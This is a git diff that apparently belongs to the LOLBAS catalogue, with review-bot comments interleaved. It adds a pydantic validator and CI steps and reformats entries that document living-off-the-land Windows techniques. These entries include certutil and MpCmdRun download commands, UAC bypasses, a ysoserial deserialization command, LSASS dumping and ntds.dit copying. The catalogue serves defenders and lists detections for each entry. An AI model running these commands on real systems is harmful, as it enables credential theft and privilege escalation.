diff --git a/.github/.yamllint b/.github/.yamllint
index d61d0a0f..ca69133a 100644
--- a/.github/.yamllint
+++ b/.github/.yamllint
@@ -8,6 +8,7 @@ rules:
 trailing-spaces:
 level: error
 line-length:
+ max: 1000
 level: warning
 new-lines:
 level: error
diff --git a/.github/workflows/validation.py b/.github/workflows/validation.py
new file mode 100644
index 00000000..64c77fec
--- /dev/null
+++ b/.github/workflows/validation.py
@@ -0,0 +1,120 @@ +import glob +import os +import sys +from typing import List, Literal, Optional + +import yaml +from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict + +# Disable datetime parsing +yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()} + + +safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$') + + +class LolbasModel(BaseModel): + model_config = ConfigDict(extra="forbid") + + +class AliasItem(LolbasModel): + Alias: Optional[str] + + +class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]): + pass + + +class CommandItem(LolbasModel): + Command: str + Description: safe_str + Usecase: safe_str + Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload'] + Privileges: str + MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$') + OperatingSystem: str + Tags: Optional[List[TagItem]] = None + + +class FullPathItem(LolbasModel): + Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. 
\(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$') + + +class CodeSampleItem(LolbasModel): + Code: str + + +class DetectionItem(LolbasModel): + IOC: Optional[str] = None + Sigma: Optional[HttpUrl] = None + Analysis: Optional[HttpUrl] = None + Elastic: Optional[HttpUrl] = None + Splunk: Optional[HttpUrl] = None + BlockRule: Optional[HttpUrl] = None + + @model_validator(mode="after") + def validate_exclusive_urls(cls, values): + url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule'] + present = [field for field in url_fields if values.__dict__.get(field) is not None] + + if len(present) != 1: + raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}") + + return values + + +class ResourceItem(LolbasModel): + Link: HttpUrl + + +class AcknowledgementItem(LolbasModel): + Person: str + Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None + + +class MainModel(LolbasModel): + Name: str + Description: safe_str + Aliases: Optional[List[AliasItem]] = None + Author: str + Created: constr(pattern=r'\d{4}-\d{2}-\d{2}') + Commands: List[CommandItem] + Full_Path: List[FullPathItem] + Code_Sample: Optional[List[CodeSampleItem]] = None + Detection: Optional[List[DetectionItem]] = None + Resources: Optional[List[ResourceItem]] = None + Acknowledgement: Optional[List[AcknowledgementItem]] = None + + +if __name__ == "__main__": + def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A') + + yaml_files = glob.glob("yml/**", recursive=True) + + if not yaml_files: + print("No YAML files found under 'yml/**'.") + sys.exit(-1) + + has_errors = False + for file_path in yaml_files: + if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'): + try: + with open(file_path, 'r', encoding='utf-8') as f: + data = yaml.safe_load(f) + MainModel(**data) + print(f"✅ Valid: {file_path}") + except ValidationError as ve: + print(f"❌ Validation error 
in {file_path}:\n{ve}\n") + for err in ve.errors(): + # GitHub Actions error format + print(err) + path = '.'.join([str(x) for x in err.get('loc', [None])]) + msg = err.get('msg', 'Unknown validation error') + print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}") + has_errors = True + except Exception as e: + print(f"⚠️ Error processing {file_path}: {e}\n") + print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}") + has_errors = True + + sys.exit(-1 if has_errors else 0) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index bdf6d09b..2f888313 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -8,6 +8,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Check file extensions run: | files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml"); @@ -17,6 +18,7 @@ jobs: exit 1; fi unset files + - name: Check duplicate file names run: | files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/') 
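Review bot: In the generic `except Exception as e:` branch at the end of the `__main__` loop, `escaper(e)` receives the exception object rather than a string, so `e.replace(...)` raises AttributeError inside the handler and the script dies with a traceback instead of printing the file it was processing; it should be `escaper(str(e))`. That branch is reached more often than it looks, because `MainModel(**data)` raises TypeError whenever `yaml.safe_load` returns something other than a mapping (an empty file yields None), whereas `MainModel.model_validate(data)` turns those cases into a ValidationError that the first handler already formats per field. The `file={file_path}` property of the `::error` workflow command is emitted unescaped and `escaper` only covers `%`, `\r` and `\n`; GitHub's escaping for property values also covers `:` and `,`, so a file name containing either would alter the annotation's properties, and the same gap applies to the `title=` value. Since file paths here come from the repository tree of the pull request being checked, extending `escaper` (or a second helper for property values) with `.replace(':', '%3A').replace(',', '%2C')` closes that.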
@@ -26,34 +28,12 @@ jobs: exit 1; fi unset files - - name: yaml-lint - uses: ibiqlik/action-yamllint@v3 - with: - no_warnings: true - file_or_dir: yml/**/*.yml - config_file: .github/.yamllint - - name: Validate Template Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: YML-Template.yml - schema: YML-Schema.yml - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + + - name: Install python dependencies + run: pip install yamllint==1.37.1 pydantic==2.11.9 + + - name: Lint YAML files + run: yamllint -c .github/.yamllint yml/**/ + + - name: Validate YAML schemas + run: python3 .github/workflows/validation.py diff --git a/YML-Schema.yml b/YML-Schema.yml deleted file mode 100644 index a452050d..00000000 --- a/YML-Schema.yml +++ /dev/null 
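Review bot: The replacement steps drop the check that the removed "Validate Template Schema" step performed on `YML-Template.yml`, and `validation.py` only globs `yml/**`, so the template file that contributors copy from is no longer validated against the schema. PyYAML is imported directly by the script but arrives only as a transitive dependency of the two pinned packages, so `run: pip install yamllint==1.37.1 pydantic==2.11.9 pyyaml==<PINNED_VERSION>` would make the toolchain fully reproducible. `yamllint -c .github/.yamllint yml/**/` depends on the shell's handling of `**`; on the runner's default bash without globstar it expands like `yml/*/`, which yamllint then recurses into, so the outcome is probably the same as the simpler `yamllint -c .github/.yamllint yml/` but without relying on shell options.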
@@ -1,129 +0,0 @@ ---- -type: map -mapping: -# Id field enhancement possibility commenting out for now -# "Id": -# type: str -# required: true -# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' - "Name": - type: str - required: true - "Description": - type: str - required: true - "Aliases": - type: seq - required: false - sequence: - - type: map - mapping: - "Alias": - type: str - required: false - "Author": - type: str - required: true - "Created": - type: date - format: '%Y-%M-%d' - required: true - "Commands": - type: seq - required: true - sequence: - - type: map - mapping: - "Command": - type: str - required: true - "Description": - type: str - required: true - "Usecase": - type: str - required: true - "Category": - type: str - required: true - enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload] - "Privileges": - type: str - required: true - "MitreID": - type: str - required: true - pattern: '^T[0-9]{4}(\.[0-9]{3})?$' - "OperatingSystem": - type: str - required: true - "Tags": - type: seq - sequence: - - type: map - mapping: - regex;(^[A-Z]): - type: str - required: false - "Full_Path": - type: seq - required: true - sequence: - - type: map - mapping: - "Path": - type: str - required: true - pattern: '^(([cC]:)\\([a-zA-Z0-9\-\_\. 
\(\)\<\>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$' - "Code_Sample": - type: seq - required: false - sequence: - - type: map - mapping: - "Code": - type: str - "Detection": - type: seq - required: false - sequence: - - type: map - mapping: - "IOC": - type: str - "Sigma": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Analysis": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Elastic": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Splunk": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "BlockRule": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Resources": - type: seq - required: false - sequence: - - type: map - mapping: - "Link": - type: str - required: true - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Acknowledgement": - type: seq - required: false - sequence: - - type: map - mapping: - "Person": - type: str - "Handle": - type: str - pattern: '^(@(\w){1,15})?$' diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index bab54d66..f65b2137 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 916762c7..d575e6e6 100644 
--- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not. + Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\` when not. Usecase: Download file from Internet Category: Download Privileges: User @@ -26,7 +26,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -URL {REMOTEURL:.exe} - Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash]. + Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\`. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 018979b2..ddc4dc48 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -19,6 +19,3 @@ Detection: Resources: - Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey -Acknowledgement: - - Person: - Handle: diff --git a/yml/OSBinaries/Eudcedit.yml b/yml/OSBinaries/Eudcedit.yml index d0ca6772..4e956b56 100644 --- a/yml/OSBinaries/Eudcedit.yml +++ b/yml/OSBinaries/Eudcedit.yml 
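Review bot: The rewritten Description lines in both hunks (`@@ -12,7` and `@@ -26,7`) drop the `[hash]` placeholder, so the text now names only the `Content\` directory where the old text said the download is stored as a hash-named file inside it. Square brackets are rejected by the new `safe_str` allow-list, but `<` and `>` are permitted inside backticks, so writing `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` within the backticks keeps the original meaning and still validates.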
@@ -5,7 +5,7 @@ Author: Matan Bahar Created: 2025-08-07 Commands: - Command: eudcedit - Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute. + Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: Administrator diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 56e4bdea..1f608bd8 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -5,7 +5,7 @@ Author: Jacob Gajek Created: 2018-11-01 Commands: - Command: eventvwr.exe - Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. + Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User 
@@ -15,7 +15,7 @@ Commands: - Application: GUI - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net + Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Category: UAC Bypass Privileges: Administrator diff --git a/yml/OSBinaries/Iscsicpl.yml b/yml/OSBinaries/Iscsicpl.yml index e02b1148..46b8f7d6 100644 --- a/yml/OSBinaries/Iscsicpl.yml +++ b/yml/OSBinaries/Iscsicpl.yml @@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool Author: Ekitji Created: 2025-08-17 Commands: - - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary + - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass. Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt. Category: UAC Bypass 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: iscsicpl.exe # SysWOW64/System32 binary + - Command: iscsicpl.exe # SysWOW64/System32 binary Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass @@ -24,8 +24,8 @@ Commands: - Execute: CMD - Application: GUI Full_Path: - - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application - - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application + - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application + - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml - IOC: C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll diff --git a/yml/OSBinaries/Ldifde.yml b/yml/OSBinaries/Ldifde.yml index cb31bf57..ff40cc7e 100644 --- a/yml/OSBinaries/Ldifde.yml +++ b/yml/OSBinaries/Ldifde.yml @@ -5,7 +5,7 @@ Author: Grzegorz Tworek Created: 2022-08-31 Commands: - Command: Ldifde -i -f {PATH:.ldf} - Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. + Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder. Usecase: Download file from Internet Category: Download Privileges: Administrator 
diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 62e0de7c..d2c20f6d 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10 - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe - Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] + Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation. Usecase: Download file Category: Download Privileges: User diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index d54ebc36..91dc3e76 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml 
@@ -5,7 +5,7 @@ Author: 'Elliot Killick' Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater - Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json + Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`. Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments Category: Download Privileges: User diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index 65ec1920..3ba8dfe0 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml 
@@ -5,21 +5,21 @@ Author: 'John Dwyer' Created: 2022-05-18 Commands: - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 - Description: Dump process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). + Description: Dump process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump process by PID. Category: Dump Privileges: User MitreID: T1003 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 - Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). + Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap - Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_.dmp and results_.hlk). + Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process mutliple times. Category: Dump Privileges: Administrator diff --git a/yml/OtherMSBinaries/Dsdbutil.yml b/yml/OtherMSBinaries/Dsdbutil.yml index 0507c875..1bf8d6b3 100644 --- a/yml/OtherMSBinaries/Dsdbutil.yml +++ b/yml/OtherMSBinaries/Dsdbutil.yml 
@@ -15,7 +15,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit" Description: Mounting the snapshot with its GUID - Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak + Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 @@ -29,7 +29,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit" Description: Mounting with snapshot identifier - Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak + Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 @@ -51,11 +51,6 @@ Detection: - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit - IOC: Event ID 4656 - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit - - Analysis: - - Sigma: - - Elastic: - - Splunk: - - BlockRule: Resources: - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358 - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index da3c0368..2898e054 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
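Review bot: The new Usecase lines in hunks `@@ -15,7` and `@@ -29,7` replace `c:\[Snap Volume]\` with `c:\\`, so the example now reads `copy c:\\windows\ntds\ntds.dit ...`, a path directly under the system drive rather than under the mounted snapshot volume, which is the whole point of the snapshot steps the Description refers to. Square brackets fail the new `safe_str` pattern, but `<` and `>` are allowed inside backticks, so `copy c:\<snapshot volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` keeps the placeholder and passes validation.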
@@ -5,7 +5,7 @@ Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User
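Review bot: The rewritten Description still spells the target as `AppData\Roaminguiverify.config`, with no separator between the `Roaming` folder and the file name; the removed line has the same text, so this may be pre-existing or an artifact of how the page renders a `\u` sequence, but since the line is being edited anyway it is worth confirming and, if real, writing `AppData\Roaming\uiverify.config`. The `%USERNAME%` substitution for `[current user]` is fine and is accepted by the new `safe_str` pattern inside backticks.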